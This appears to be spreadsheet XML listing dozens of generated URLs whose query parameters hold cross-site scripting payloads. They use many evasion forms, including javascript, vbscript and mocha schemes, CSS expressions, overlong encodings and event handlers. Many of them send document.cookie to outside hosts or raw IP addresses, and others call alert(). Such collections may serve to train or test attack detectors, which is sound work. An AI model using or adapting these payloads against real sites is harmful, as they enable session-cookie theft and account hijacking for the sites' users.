    <t>/openhhoejprciju/6metcshutdownautoexecdq/jalr8nmt/4ka1vemypty3irwkgn/e3o51fhim12flc/l3tmghkdabemhcen1/ptnat6ngren0e/gjv/entmhineensiacu/meh4atwlirtte.sh?n2ssteo7rtuhlur=passwdeeraoeitnx;ih9orlocationid&amp;ota7snihrctd5vh=1142816319&amp;a6tnnsane2ksta=s\\trtown&amp;ahnweyateba6c=tta&amp;tnhwnq3see=eqari&amp;rd=sg3divl&amp;nh9ng1plku=tgia&amp;thhiricauag=8&amp;yt=t5esn5awjo=yl&amp;shpze4j=756891&amp;dvns=script&amp;ndoqraearf0s=&lt;meta+http-equiv++=++"++refresh++++"++content+=+++"+++++0;url=javascript:++++[document.location.replace++++('http://www.re.com/cgi-bin/nsng.cgi'+document.cookie);]++++"+&gt;&amp;u64=z2a2|meistxf</t>
  </si>
  <si>
    <t>/iip.css?hrlaaenigtcifeu=27&amp;hatr2atira=wojedc|zfles1d8&amp;risgssngsihr=6w+ee&amp;shuoxa8rtadere=n]3a&amp;xs8update.jrtphww=window.openat&amp;asialsh7=+i0viao2nyi&amp;rnnie=[\\xc0][\\xbc]script&gt;[document.location.replace('http://www.nt.com/cgi-bin/ontorais.cgi'+document.cookie);][\\xc0][\\xbc]/script+++&gt;&amp;broe1dtsrset=m+ny-o-=4-2ddocumentt</t>
  </si>
  <si>
    <t>/rfkciidavrsxzsrrred/9dnqe8ese/b_gurcpyn1t/rnsaetlmc/aqhuhnjwsya/gn1ugahomezsil-y/5sraretdeearsi/gudgzuxo0rjd0cb3j.bin?nsi7dbnt=4&amp;ootoomelzno=&lt;img++src++=+++"+javascript:[window.open('http://176.90.145.15/inat.pl'+document.cookie);]+++++"++&gt;&amp;ny6i=]]bo</t>
  </si>
  <si>
    <t>/rstwelpmq5dra/tz.asp?m.7qzqunpzp=0\\ta&amp;ot=htlbecjed0tii&amp;avnbsi8eoybaamj=710&amp;igkrtt=iempnadtmstste&amp;vtd8ritc@k=bryq1@k&amp;ieizsc=ma;nf)itet&lt;n&amp;fk8xtaght=iaiotq&amp;uareiz5snp=29&amp;kepashaa=7&amp;rnhw0tsd=&lt;![cdata[&lt;!--]]++++&gt;&lt;script++&gt;[document.location.replace('http://www.tr.com/cgi-bin/neittail.cgi'+document.cookie);]//--&gt;&lt;/script+&gt;&amp;esoz2tmhiejl=weelfnu15llce5i5et</t>
  </si>
  <si>
    <t>/tthti2adepi.php3?solnovetx9=36877586&amp;lldcay=k&amp;&amp;oils8a=skrtrntleosiiwdcsh&amp;aorcuoyiytlxf=pjfu&amp;553n0lwindow.openb=6$fnn7w&amp;n2xaeuretar=&lt;a+href+++="++about:&lt;s&amp;#99;ript+++&gt;[window.open('http://34.122.116.189/ieling.swf'+document.cookie);]&lt;/script+++&gt;"++++&gt;</t>
  </si>
  <si>
    <t>/1okvntfe/heeer2ec2hheijeqi/cnew/qcmdlm1lvjhtpassnhr.html?aheuroeldejee=uh&lt;3r'e)r3ordds&amp;oudupdatefrmu-r=eteahlewce&amp;drsd7i1he41=2&amp;@6tvb.bepk=eeeb&amp;sm=0leiuncxbi1oronh&amp;bgpufvz=u4&amp;cn=&lt;input++++type++++=++++"image++"+dynsrc+++=++++"++++javascript:+++[window.open('http://36.192.132.214/nentve.swf'+document.cookie);]++++"++++&gt;&amp;fteaiiaatb=8s0ik4wdog&amp;htleaasvnl=htpassrrls1</t>
  </si>
  <si>
    <t>/ebftd3c/hsemtzovcitmuacx/kha04ieek/erhaamjkoqujmdt/5wu9eaiispdhente/5adminba.yshynxuhavingie/nmynossaaelaftsa/ea2psgt1fmqck0hgybua.nsf?t6eb=i&amp;conoi3tjtmtb=eigu7geddr6iem&amp;e0mpati=917&amp;nscfckeed3teue9=y-8y&amp;r_.allcvlinkle0=sr0e|ugsxeurwindow.opene-&amp;tatjjieile=8418053&amp;nssqdmizn=954408125&amp;huetdnbonc=&lt;img+++++src=+"+++mocha:[document.location.replace++('http://www.esmeie.com/cgi-bin/roit.cgi'+document.cookie);]++++"+&gt;&amp;ztistsl=eu&amp;yoowe2im=sv.av&amp;sis2-pckp=d&amp;aiils9awo4o5h0b=mdimaoiase+nr&amp;nullp6suq=895488</t>
  </si>
  <si>
    <t>/sniftn/nbeuju9mao61fq./s9dno0qwct923ni3xq_/eti/ns79g/0vsdn0wp-v@/8j/ierteciiutya7d.aspx?ety6otseoehd=9449871225&amp;eekaetoo77ecet=sdp&amp;hgwhhf1itdiha3e=49&amp;lntyhofjbrtt=script++alert+(eemi7e.nuqtt)script+++&amp;uhttps74where0dbclib=detoqbid&amp;dircmjcrh=86&amp;tuulew=49258&amp;bcxrrm9=uodloeoarpnwsreen&amp;7qaiir5bek=xhtherse0i&amp;miro=50&amp;idxdeletee=5zba1x2rtoe9&amp;ehsaee=nnoryt&amp;ji=irroh+agdsy&amp;uhgs9epoitork=qtxpei8ai20rs&amp;sselnisfznttyna=sdfqqp7fwjlt</t>
  </si>
  <si>
    <t>/eaxgg-kg3bsmme._l/esllridtshc/auhskyngj4xuw2w4u1cp/mpu/ncb3w_29a.xm/yndntitsmr/tpmo3io6twtia/lt3mxinibd/o9aagsti.msf?chu=&lt;div+++++style+=++"binding:+++++url([http://www.orta.com/script/ynma.swf]);"++&gt;&amp;3anrtsbrci=rn</t>
  </si>
  <si>
    <t>/retu7r/pnoeceoh/etrfoabhove/r3qrlqfysiv/odeaetsclhsoatewn2/nfgkleqzduayfb3ougzi/ijt/n@dpepaaxzhzafpf1q9n/kh@iq4y67si0/sxrnhclto/itnctoichctjrelsl.gif?zo@iwajeadad=6n&amp;histnhnioeaacqt=f79iwvww33&amp;nktgjceaakttl=&lt;body+++onload++=++"++++[alert++('tohds');]++"&gt;&amp;eu4fteeiodieak=alksessle&amp;ahabhjedgeersa1=nd</t>
  </si>
  <si>
    <t>/hi/4pavofmtk3hl@r/czq3akkny63i/oreaeeodinth7aam/xednsdcd2ettmu.png?qi=&lt;div+++style+=++"+++++binding:+url([http://www.ar.com/script/psq.aspx]);++"+&gt;&amp;izoe0oi5guwcet=y@oinput&amp;wq0f142iv=mti6ereotah@</t>
  </si>
  <si>
    <t>/avlk9xw5m1vc.kyk/25slyriod_q3/zsueecvewnnxtr/hzrrhb/rr.-p/aesnavyj7y4df5nf_eiv/il6riba.jsp?l6t0d9iah9u=rg_7&amp;arew4e=+?&amp;dbjrvhnb2a=u0)ooexecgrn+access_logae-mhd&amp;fsdart9rapefj=aj&gt;o9&amp;sraam=bgsound+&amp;heeciis=19-wbrc&amp;cbwhh=shavingoestsh&amp;httpgyk=617&amp;rogzkfpoeosgos=53201963&amp;ntstq=javascript:+alert+(++"++++ldt.0epdn4")&amp;0iltzoe=sasmtuheamsoix&amp;qttv=ln&amp;hynnr=ml?</t>
  </si>
  <si>
    <t>/mzklrskjneftimzh/otpnaalt4itiwmi/etaelietoeeiorx/eeler3tee24areat.dll?tmphdiw=(l3&amp;re6e=848225&amp;aspciaicpyi=07606480&amp;iant4wsnacfs7i=n75ctlnzesn&amp;doawiieiallp=fo&amp;ahmu8=&lt;bgsound+src++=+"++javascript:++++[alert+++('srmwrharhf');]+++"&gt;&amp;in=inm&amp;vtvzposition5bu0=asnhoa&amp;eaosscneeo=kone&amp;.0aak4=ntf302ootmhanfeoh</t>
  </si>
  <si>
    <t>/bifsrtmnemoeo/gty8q9z5ud4vgs/ttsts/wzafwq/indcoionjpotideir6t7/j2r5edu4veaaaulvnwie/eewd8jqqnfbi0/riis/ngsk4wyp@/dttouh/79oaoaplng/like2.pl?ei=p+r@+nbe&amp;rheskdancpl=+hd&amp;fosreplaceeysp@2=98406995&amp;aidtl8e=id7ttdorisjwtsjft&amp;trouejncrgm=)at&amp;-0wmn0gyg0a9=a&gt;q&amp;tt=si3'h&amp;eaal=76472&amp;adrlalersar=&lt;img+src++++=+++"javascript:++++[alert+++('ei');]+++"++&gt;&amp;tktgni=epe&amp;iuoonne=tpqgmdb3j&amp;lt=+rst+;i</t>
  </si>
  <si>
    <t>/rmtiacrsert5hseea4rd/8ph1bhmuincludettaz/l-u8kkxodzmbdra./kehn/g-aaevmppassthruf/tt/hns7mosp09ioher3t/lpklct0aha/sne3z6sw_h9stservices/qpatretoz8chislaln.mspx?ori9rnswiorrr=rza&amp;nsso=316&amp;h@8hf=ztw&amp;copypq3om56nl=&lt;div++style+=++++"+++++binding:+url([http://www.re.com/script/oii0snakvu.pl]);++++"+&gt;&amp;afri=hrao%stotnddj9tettnz&amp;aens83=ou)</t>
  </si>
  <si>
    <t>/lmtoieztatm/jf@.bin?4xap4c8qzi6k=ssj&amp;boscocteetant=lctmr&amp;evgqeo=it4lkjqhv&amp;edvau=8310&amp;tlcea6lfttryh5u=&lt;div++onmouseover+++="++++[window.open('http://9.12.195.215/ge.asmx'+document.cookie);]"+&gt;&amp;jscso=imiwb&amp;e6ecbs=r2uf4qz1th</t>
  </si>
  <si>
    <t>/0hfel0tfgrscy26dq9u/a1q1hudb/d2sge3lue/mdz6by7yj1mq5/ssmthen.jpeg?tse3iasbdtlat=hl&amp;8ithmkaenauw=lswei8eaudxa9uet&amp;yoaxrsxre=&lt;xml+++id=+"++++x++"+++&gt;&lt;a+++&gt;&lt;b+++&gt;&amp;lt;script+++&gt;[document.location.replace('http://www.rori.com/cgi-bin/naetseesre.cgi'+document.cookie);]&amp;lt;/script++&gt;;&lt;/b++&gt;&lt;/a+++&gt;&lt;/xml&gt;&amp;rllsqa=h0t4)koh$s|i&amp;tehjaehlft=96042&amp;ehwtsf4ios=247467</t>
  </si>
  <si>
    <t>/scsuhaieigth6mte7a/aqdiqcwuq/dkpasswdp9bap55r/chtxe52is/bie9dtnn/hueedhwcah-3mqrh/nkn-42fex6omalx.swf?r7ermmehseddlty=&lt;div+++style++=++"+behaviour:++++url([http://www.mera.com/script/jihn.pl]);+"&gt;&amp;aa2qetn=tdnfeolemootekkt&amp;selvrvsesre=rrcp|tiommi0o2liborhinput&amp;inacee9he=2473200&amp;yhloqwnmcsi=dskdt</t>
  </si>
  <si>
    <t>/l9qy1-rr.-z/se4l4eu79ajig/rrccaruih9uoshrilhir.htm?ehnoasupc0apms=kln0acmgng&lt;i18uon%me&amp;qrqd=hnxgr0h_q&amp;uxpslzw_fik=f@&amp;o5edwxuhdart=89&amp;sh5gveetirrdo=&lt;iframe++src+=+"++vbscript:[alert++('xm');]+++++"++&gt;&amp;tmwaie=gbfoun</t>
  </si>
  <si>
    <t>/iuee2pmoptddiagro.shtml?it=|peaisn%h3&amp;tsgmae=e7l-vpecuj1&amp;imdear=69553226&amp;apasswdj.=erd0uxmbacd&amp;jparrfcf03=91&amp;qlieosidewsnbl=5&amp;childcq4=&lt;iframe+++++src=+"+vbscript:[document.location.replace('http://www.asnsil.com/cgi-bin/ndre.cgi'+document.cookie);]+++"+&gt;&amp;otfd5radi=aonl4ou</t>
  </si>
  <si>
    <t>/cjg/rzr5oairot2nia7avas/e7dj2@bk2k_oml8k/xectarjlgq/0vpi.glslxard@rj/ceart36woresootad3/ekvj.a/i7ap-vqd/aymnac6t/ho3s-xv.kue/5muwoirere.jsp?o2har8koyktat=4rwh&amp;duogid6br=9&amp;est6sfulamftz=&lt;div+++style++=+++"+behaviour:++++url([http://www.seorieta.com/script/diuaeuyizi.sh]);+++"++&gt;</t>
  </si>
  <si>
    <t>/urse7wnsgeo6lu/xhfoiohhg8i/iz_-4vweqnvxr9iertf/eetemnckhiixrkesi/a2znl8ci4fewy6q.aspx?mzobiesecpieu=&amp;&lt;script+++&gt;[document.location.replace++('http://www.asolllge.com/cgi-bin/ntrorestta.cgi'+document.cookie);]&lt;/script+&gt;&amp;xtx=o7t&amp;lyyr3h5skaos=11977&amp;varna.=29&amp;njasctshi=4076224&amp;tlagfczqeenere=979892200&amp;aicnhlcwn=793&amp;mchsb=6169&amp;dirmrtiu0s=huksystem\\</t>
  </si>
  <si>
    <t>/ao0ozxmenomv/2yvbxl9dqiahtpasspassthrup/d4/-cpositiong.html?5ye=&lt;a++++href=++++"++++about:&lt;s&amp;#99;ript++++&gt;[window.open('http://23.91.168.73/ne.php4'+document.cookie);]&lt;/script&gt;++++"++&gt;&amp;ehcr0ol9eyaw=$j&amp;agtcathbepc=xigrnekenenz&amp;eetsttsiae=ino-(etiaawl/&amp;5lb9d=t</t>
  </si>
  <si>
    <t>/dhro4uyh/o7n/tlrw3taesi/n9zsot4kqpc09evxxi/pnuegr8nq/udup6e_hcwn46bt1ep/teteiuzels8jotff/mob32dstdinea/1ogkz.jpeg?aslel=n9detmeena&amp;tiot1=la4+&amp;rpenuaeh=&lt;a++++href+=++++"++++javas&amp;#99;ript&amp;#35;[alert++('vp5yprsei');]+"+++&gt;&amp;tfoglirnmoig=odeiyoazr7af</t>
  </si>
  <si>
    <t>/yd5gtetsoeoh/es6kqj3@wc5biwx0/negwindow.open.lgnk-8/qypjk55hto/r5uodd@/ap/hl52ggz/slet9oehsaee6n7eh/hh/dwvvn2in/as/td2czsbui5moq.php?tu9iqysq=8168&amp;hm5o=hefq&amp;mkudpm=on&amp;ndbj=zsaie&amp;si4tvkfxru0=ws&amp;&gt;&amp;othoeesvawfds=587704&amp;eenr=scw+ho&amp;aa9locdosr=&lt;div+++style++="++++behaviour:+++++url([http://www.veorreri.com/script/oaepctn.mspx]);++"&gt;&amp;euhmair2avogbxy=htaccesnobject8gt&amp;e8ilou=vud$;h&amp;anhri=senuy3asettrt5mj&amp;sveaao=fguregcapsyp1u5ql&amp;sosaanshtl=hlinkn0fcha:t</t>
  </si>
  <si>
    <t>/ir1meau6rpcog/2fkzwv50mdmjxmcko/xetmpnn/cht4eaier4usrkcaw/7iuaac/a3@gmxx-_5d_/nroneegj3qr5jawy/ht58usjb_e1id0/y-stvtpedgbmwzceryt/qh7oj8.9dtt/sr3boda/edsxbhwkmvtsd.mspx?rn6iw31=th2ellqegencntmee1&amp;dpfa=nvna/cogiwinnt&amp;s8h=egdpcb2zync&amp;hth=edq5debv&amp;i7ttrho3agd=[\\xc0][\\xbc]script&gt;[alert+++('e9rai');][\\xc0][\\xbc]/script++++&gt;</t>
  </si>
  <si>
    <t>/fulq@ndiasz-/iigu.shtml?aeinhu4ax=r&lt;&amp;&amp;selectntl=39627032&amp;a5sayno=2ydknae&amp;eniwearaeis=netcs&amp;sfpb1stas4=09245&amp;shhte=zsticieserhed&amp;awm6rfh8opbre=hs&amp;ehtpassdo$@hyot&amp;oih4khamieodcd=erba&amp;oasgliteifb5=641435323&amp;zne.r3jnj=1&amp;e0m=a5a&amp;otd=5i&amp;eaud8=&lt;body+++onload++="++[document.location.replace+++('http://www.sear.com/cgi-bin/li.cgi'+document.cookie);]"+++&gt;</t>
  </si>
  <si>
    <t>/46sie-zwun/rddlf/cqkr4cat.mdb?umprd4aidftes=[\\xc0][\\xbc]script&gt;[alert+++('jlyn6fisde');][\\xc0][\\xbc]/script+&gt;</t>
  </si>
  <si>
    <t>/ihih2erlml.dll?nhocu=&lt;xml+++src++="++javascript:+++[alert+('ei3');]"++&gt;&amp;ioxt-4ctelnet=9026463&amp;9m=4353267&amp;ruolecqtrd2wskr=/(u9etaoa&amp;kpuf=tittuwdcbsennbw&amp;ybnpa=talpitsneoi&amp;ibelgieot6orzev=tlttl</t>
  </si>
  <si>
    <t>/yu3o3bhc/ku@17reoiv3ora.a/a70uwdnweuw-/ien4e9ngdcytntwus3e/vw/like2z/mugq/nqlarf5zwb1.aspx?jzkr=307893&amp;nyesdfgoodow0oi=tdeletev&amp;mp20nnareh=woi:z&amp;klato7ononwps=tp.rcb7rssc3&amp;dljbi=iupjtjiyav&amp;8d=6&amp;h3hrtynzeiterit=&lt;img++src+="+++++maan++++&gt;++"+onmouseover+=+++"+++++[document.location.replace+('http://www.lintieel.com/cgi-bin/roro.cgi'+document.cookie);]+++"&gt;&amp;q@nzghzcc=61&amp;nzoerttsame=e6ndgiwindow.openm&amp;ev=+e)&amp;hbottjizbe=m;</t>
  </si>
  <si>
    <t>/ary/7rsqrhzqjhfu/lsw0dhtoitataoodein/adhttpstfpidqrmtmphttppl/cewes9kvs/t2twyob8ggffsr.php?seawk8nea4ht=rzen-p&amp;includedylwaklt=&amp;&lt;script++&gt;[alert+('iote');]&lt;/script+++&gt;&amp;p2tservicessdformbly=lsv&amp;deutrmidn=o5nl&amp;vy=94&amp;froaunisnne=1426826</t>
  </si>
  <si>
    <t>/ay6zwkt07iw-m../daaseimpfc9qeidwplqt/ayznkol6tou5pl4nt/e1ks8fhw.zaautoexec/trhwwloxerlp.css?2nll3oqsofnw0o=&lt;link++rel+=+"+stylesheet++"++++href++++=+"+++++javascript:+++[alert('orn2ey');]++"&gt;</t>
  </si>
  <si>
    <t>/eseajogcauc87ln0adn/e7vtru0me/hledr7re6/snazrtgdibec/e1vsscript@7fnn_akzi/eipneotk8s1iwoaey.jpg?tnooxk3hnkrho1s=tazuntbuec8|do&amp;e1icr9we=ye&lt;&gt;processing-instruction&amp;xsbo=oaipe(9&amp;yr=etow&amp;iyfaenuondsfte=&lt;style&gt;&lt;!--&lt;/style++&gt;&lt;script&gt;[document.location.replace('http://www.etatve.com/cgi-bin/na.cgi'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;tuaaiwobtr=b0th&amp;zieino=nsydeobjectudarg&lt;&amp;aaaf=e75na&amp;hanranul3er=9&amp;tan=e5hnl7qbl&amp;tilray=e~n&amp;nv6ujdnk.a0where=sdt+7xyr</t>
  </si>
  <si>
    <t>/oaelznijlfrowa/rb2includeyocvpn0/llq.k@nvhx/shagaelorinwaoe9b/saqf2/ems/puan0t6yn/nhpmhaeeksd/max@tagdsa5_lc.bas_y/sakse.jpg?may0msy9uas=1&amp;xi1null0lz6=admingcvw:rlatay&amp;ayenetetw7e=eilyansar&amp;x27xxhr=3&amp;at=&lt;img+++++src+++="+++++itasorng+++&gt;+++"+++onmouseover+++=+"+++[window.open('http://228.163.252.170/itic.bin'+document.cookie);]"+++&gt;&amp;resnih=mts&amp;aauueudut=stm</t>
  </si>
  <si>
    <t>/h9m9nuv4bn/tdol0xqfcsfydnmq/ty_0ent6uey5p0q8/tx9itximubia1i/or97d2j96/tszlrst2kwpe@l9jvanu/4cz/rxk.kgbtg4lp.mspx?ldiemotrefr0ra=tofeo&amp;s4=119&amp;9eopdatiiit=scbr23ou&amp;arot=o7tahnihfossd&amp;ueoatlssbn==)&amp;iemeis=98&amp;@o_im5fpmg2o=ngam&amp;uoboeebtenttleg=)eit&amp;y0a4llo=2975566&amp;cee0e1=7017125711&amp;2cmdxp_ftp-phpctp=cavct0zzzpl&amp;dt=y]&amp;sninov=y6+f+&amp;zeoh1tlasmbx=r9aitm&amp;ocadiy=&lt;img++dynsrc+++=++++"+javascript:+++[document.location.replace+++('http://www.ro.com/cgi-bin/ermetanide.cgi'+document.cookie);]++"&gt;</t>
  </si>
  <si>
    <t>/tn1borunpkdssxtd6r/is2d8iwm/-formkyzdk/fm0c/eejbuil/san.htm?clpmullaey2ntia=0043381&amp;amtby0otnedah=ipt&amp;e2twis=amo&amp;etw=2284&amp;yrzn9o=olranlsczb&amp;exyacaaroas=&lt;img++++src++=++"++++mocha:[document.location.replace+++('http://www.etto.com/cgi-bin/ll.cgi'+document.cookie);]+"++++&gt;&amp;o7wotaloq1atm=a(nb+cod74wget~inetbaphp&amp;tistlosasg3lrto=isrei8htp&amp;2urqa8gtaan=ts&amp;wget4v-insert-h8=295334751&amp;nmedsbdfeioep=8544948743</t>
  </si>
  <si>
    <t>/n_bw4jolpzawjpeh/1fromc_dv30/b9_xlccxgc/unsryqodsfgrd/ttityiyargi8nhsc/jnl/mvvb/n7veu3kctb/a-89fqkoarf4a_vcnt5c/o7f8t2_p/tteziedjhteanm4n/sgvpg-tvwvhunij.pl?rzh04pomhqis=8&amp;elnex2oz6l=&lt;meta++http-equiv++=++"++refresh++"+++++content+++=++"0;url=javascript:++++[window.open('http://8.56.136.8/meie.bin'+document.cookie);]+++++"++&gt;&amp;svett9o=5570&amp;rqayzvgo2ah=7&amp;as=zoadhyi&amp;eaeitixl7onlaa=1027&amp;lrbib=h4hry</t>
  </si>
  <si>
    <t>/oax.cfm?9gpceahu=e8y7wstn98oefzqmdf&amp;teonai=|&amp;mrsoe0my=4&amp;dt4ulohciravsi=&lt;img++dynsrc+++=++"+++++javascript:++++[document.location.replace++++('http://www.lileer.com/cgi-bin/mavesier.cgi'+document.cookie);]"++++&gt;&amp;zoi=yhalbl&amp;rohlmeiees=&lt;tsm%s168e&amp;o8n=0727185253&amp;eae1weae=s8pu2bh&amp;htqoiet=o8rset6%utlunz/&amp;en6mhlh=uz94t</t>
  </si>
  <si>
    <t>/tsnnpci/xpors8/apnl5tcftq.exkt/di/oudsaennw/i0hikac7oao7zhspt9/4-p22r_anef5xyi0/ke9knj/srdch/tsgectturateenaa6a1.cfm?ytnh=m2rtihsocdr&amp;ls_l48wv_daz=12&amp;zrnmipag1mtrto=&lt;div+++style++="+width:++expression([document.location.replace+++('http://www.onst.com/cgi-bin/ilisndne.cgi'+document.cookie);]);"++++&gt;&amp;feccrtsva=llsvqrul</t>
  </si>
  <si>
    <t>/xp.x0xesz/aeendersi/o7tb82_p.png?ri=&lt;img+src=javascript:++++alert+('urlbap.pstk')+&gt;</t>
  </si>
  <si>
    <t>/rtar/tu/aasiet/dyacd.g36yaofiy0gv9g.cgi?g1w58ykdl=&lt;div+onmouseover=+++"+++[window.open('http://226.2.77.237/neet.msf'+document.cookie);]+++++"&gt;&amp;ceaes78hz=2ia5co37r</t>
  </si>
  <si>
    <t>/toteiiwnel9p/efsedmumminhwucsh/mbzg/mabft/rblatvt.php?7gs48krs7tj=mc4fkbsv8h7w&amp;ebzdgrdlncy8s9=d+gopend26t[&amp;ndrsslsr9oemf=pr&amp;9wbetweeng=f-5rhk&amp;ihbo3msm=asdeiedcio4deh&amp;ffecdaooscus=&lt;xml++src+++="+++++javascript:++[alert+++('oo');]+++"++++&gt;&amp;cietis=35837&amp;ee0hol7ahr=[oe++ainoden&amp;wohizandqp-=+noesam&amp;yceag=teo=-moe4in4znodeatmpoae</t>
  </si>
  <si>
    <t>/iq2tmxk@nmsjmxosy/taq/randa4fvumksock_stream@_sy/h3hj_imjacyoskivvefp/nwtmpcmd@wsigboh_ib/mome6lu/rutalisk16tlidirdtps/larapv9mrngkhrs.sh?6woheyr5puts=axqbl@y&amp;opusrnlinkp=h34wlghpr3&amp;.a6jqfxa=tmjecz&amp;es2jthgpdadro=&lt;div+++++style+++=+"background-image:+url(javascript:+[alert+('edeogs');]);++++"&gt;</t>
  </si>
  <si>
    <t>/3o%u-gncm7dimgl/ia3dymkqlxbfav2y/arekpngeprehih/v3w@nfwkzo2h/vhuyhdzegggiyctm.pl?hoirieesovzritt=46008630&amp;ex0c=297292&amp;e8fte=gaanz?lrheo&amp;1tsrmihi4setcoq=+(a&amp;reo4uayt=2nurh&amp;daiap=74968051&amp;ee=98018&amp;enoslnrsaeesc=503654&amp;6xghttpszafdocumentgvoq=ats&amp;tioiradt=ef&amp;fwes=9&amp;dt2aonc=oaeers+at\\roo&amp;cci2oeibwed=mut&amp;wp-35urwv6xj=ijorlsy(h&amp;nrmkpel=&amp;&lt;script++&gt;[window.open('http://93.147.51.148/trel.mspx'+document.cookie);]&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/7ftpacrkgc2i5b/amtsvsd9a1obj2-ws/cjikwgpfb3d0/hhb0weg.nsf?bno5gsljqurlr=tndeeetnbwy+i&amp;afrebe4udskhi=+ggeyedtc&amp;l&gt;ba'&amp;iemni=eio+style=left:expression(alert++++(rsr.3lgooy))&amp;sm3h=074298&amp;zeep=csxecoieeixrui&amp;uerihm6tia=4081756231&amp;y1i=olktea&amp;adle=51&amp;tmabee9s2eatlt=rdd</t>
  </si>
  <si>
    <t>/gn6mbovwtrvc7h9d/emxsoihypaq3mailhtpass/xj0/lxgryag-k.sqok/1dhvylvhyzzse6al/ot1dtgaf.d6g/ieanwismnefkome/eaes9tnrzdstl8qna/nu5jiwlj9yqgg.swf?eegnueusoie2n=&lt;img++src++++=+"++++llal++"onmouseover=++"++++[alert+++('liuitenn');]"&gt;</t>
  </si>
  <si>
    <t>/dmtqmqfihm6/gj2sehk5je/n-95bzbixc5fvq/thrrdn/5o/esavraeaeby/ambzaau70t5ez1/cmdv/copyitprocessing-instructionken_bexec.js?@9ps86ru9gqaccess_logy=txxqshyngavio&amp;tduzcxamo1e8n=tein6riuxnullnanc&amp;e5ifrt=:hi+&amp;ymsy=&lt;img+++++src=++"atasneve++++"onmouseover+++=++"++[alert+('bitm');]+++"+&gt;&amp;hlegrlppz=8926&amp;rh=oeehussr(as+fena4nt&amp;55winyezqusrlperl=eedwonsoeaaaitsdhe&amp;upufd=06628787&amp;rvf8=t0znfnn6eiaelelocation&amp;tti=vre+dtaottj&amp;fik=7anwr5connecttj|ancsgtfsy&amp;roeikanfdntnr=s2n5mtelury&amp;om2gtrrceeeaot=sra+i&amp;hfehmnntw83otas=u8y</t>
  </si>
  <si>
    <t>/a7fjv-macelu3z26/o-znh80/idt2wisonwz9se/5ncdneincazeulnu/csdiehx86iahs/rpy3@pjuyq/nop-6lj.jpg?nqysdasha=&lt;img+src++="+mocha:[document.location.replace('http://www.na.com/cgi-bin/nd.cgi'+document.cookie);]+++++"+++&gt;</t>
  </si>
  <si>
    <t>/exwutc/ion7qrfi9esr1taas/sgpzxx3@mv8fxr-@/clbvbtutrtxpositionyd0/ext.asmx?rw3b61or_positionz_=oail"++++style=left:expression(alert+++("++a79.ei+"))+++alt+="&amp;diaedeqi=cas5wtsoo$ths&amp;8u=samte)emhe&amp;reahasnia1rzet=3144379&amp;duinputophpvarr665=ye-bhomeh5d+(e&amp;rmvjzonnode=s@4e3pyw6pxl&amp;xuesea=tbccmdmlz)g:rlikei&amp;tvayne=c5r7e</t>
  </si>
  <si>
    <t>/rd-ldi3c3zxsaeood/vsvw5updatedliv2ywzc/dttre/9wypdu9bhp52jlviet9q.gif?untolilnehixsi=otx&amp;lyecouhg=2+d&amp;n_vn=07&amp;2t=&lt;div+++style++=++++"+++++binding:++++url([http://www.rielnean.com/script/eso.nsf]);"++++&gt;</t>
  </si>
  <si>
    <t>/yirn/hhasafhdstothae/db5goljh-pselecty/okkimwblpz2ig.js?r7odsagkatiet=&lt;img++src+++=++"+chanllit++++"onmouseover+="+++[window.open('http://246.206.148.16/icla.mspx'+document.cookie);]++++"&gt;</t>
  </si>
  <si>
    <t>/lhi@p/ehos5ario6mnsfee9/td/vrftk_ii0pzjliw/bhwjuowindow.openfrommlckxn/hhih3/tnrg/ogt-9nh8/athasxx0h8rd10.msf?slededifriei=htaccesth5hfnb'a0phpv&amp;h6meiorao=&lt;/+eswfromreaftpr+h)sd:wget&amp;qxuornq=22530&amp;em=46&amp;h7wirtueneryrdo=&lt;a+++++href++++=++++"+javas&amp;#99;ript&amp;#35;[window.open('http://219.100.36.103/anenet.mspx'+document.cookie);]+"+++&gt;&amp;a73a=751&amp;rfaoe8sosymc=9535164&amp;eopennodexj3_=fht6n3rlr8ipuau&amp;hs=r=</t>
  </si>
  <si>
    <t>/ispihna0ioyreti7ahtl/sgptxt3mru72ql/ldov/epcosejlhubtata7tchz/52zq/a97heee/duwkus.5t/c9p0_jtbowrx/fxi57p/0f/mwmnh7/o991bzzfj.shtml?0echokdf7htacces=5519404&amp;lqz4ivwz@=taccess_log%uee&amp;ero34fqneeis0o=ihajo&amp;eearr=21&amp;prrmdhtuaseroao=on6&amp;kehs8yvh1yt1w=60673&amp;pnsxsnstnam73ev=70&amp;eiohondnxine=&lt;link+++rel+=+"stylesheet++"+++++href+=++++"+javascript:+++[alert++++('bonheei1p');]++++"+++&gt;</t>
  </si>
  <si>
    <t>/faulttc65einsad.php4?sloss=2&amp;er9eetbeotiae=6&amp;uf-zfptyotdr=xaaneseml&amp;m1nui=&lt;!--+--+--&gt;&lt;script&gt;[alert+++('8ha');]&lt;/script+&gt;&lt;!--+--+--&gt;&amp;g9silbp=tmpt&amp;ag9tr=aiframe7tseof;dunes@gn&amp;pc=rrwf3os1fttr&amp;ncteoipem14hj=0opt-e&amp;\\t&amp;n7gokco1wbody=iq5zw&amp;bcot2ae7=uta(</t>
  </si>
  <si>
    <t>/t.ngc4uzwczgg/pvozczgwiuw_gnef0xvi/lz1cn8a9r04byhz3ui4/e10vm@.rxuvehwt/4acqgnumyformyn/kvdrieyeinv/d6uirv/@vaaeiggpfcmou/fvlvr5tviwn/il/sczsq5ymbx.js?qyzdlsnqdyad=he6&amp;a2apterind=&lt;iframe++src=++++"++vbscript:[window.open('http://115.143.112.178/renein.mdb'+document.cookie);]+++++++"++++&gt;&amp;ndlnc=sze1il?dxmlm</t>
  </si>
  <si>
    <t>/cwjrgyrkvplmev6l/szd700lh8s2/nniileul.jpeg?s7iaoa1k=tfvbscriptonveetto=t=&amp;e51zi1i=019972&amp;chltowe=&lt;img+src++=+"+mocha:[alert('oteflpdmru');]+++++"++++&gt;&amp;nif5rd8tngtit=sad&amp;location6yh@daperlpw=8l8fb+0&gt;uusr&gt;oq+$dd&amp;180=o&amp;alijreip=openlocationy&amp;eop=mentlhu9&amp;t8ocuj=sli3oixyhueoce8&amp;rutassscnar4t=3x&amp;sj3wn3gpb=roascriptnay2f</t>
  </si>
  <si>
